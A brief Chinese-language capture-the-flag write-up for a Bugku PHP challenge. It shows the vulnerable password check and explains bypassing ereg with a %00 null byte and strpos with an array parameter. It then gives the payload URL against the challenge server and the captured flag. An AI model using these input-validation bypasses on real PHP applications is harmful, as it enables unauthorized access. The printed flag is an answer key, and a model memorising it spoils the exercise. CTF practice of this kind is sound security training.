<?php $flag = "flag"; if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) echo 'You password must be alphanumeric'; else if (strpos ($_GET['password'], '--') !== FALSE) die('Flag: ' . $flag); else echo 'Invalid password'; } ?>
ereg可以用%00来进行截断
strpos用数组进行截断,返回null
payload
http://123.206.87.240:9009/19.php?password[]=1
PHP是弱语言,对数组比较敏感
Flag: flag{ctf-bugku-ad-2131212}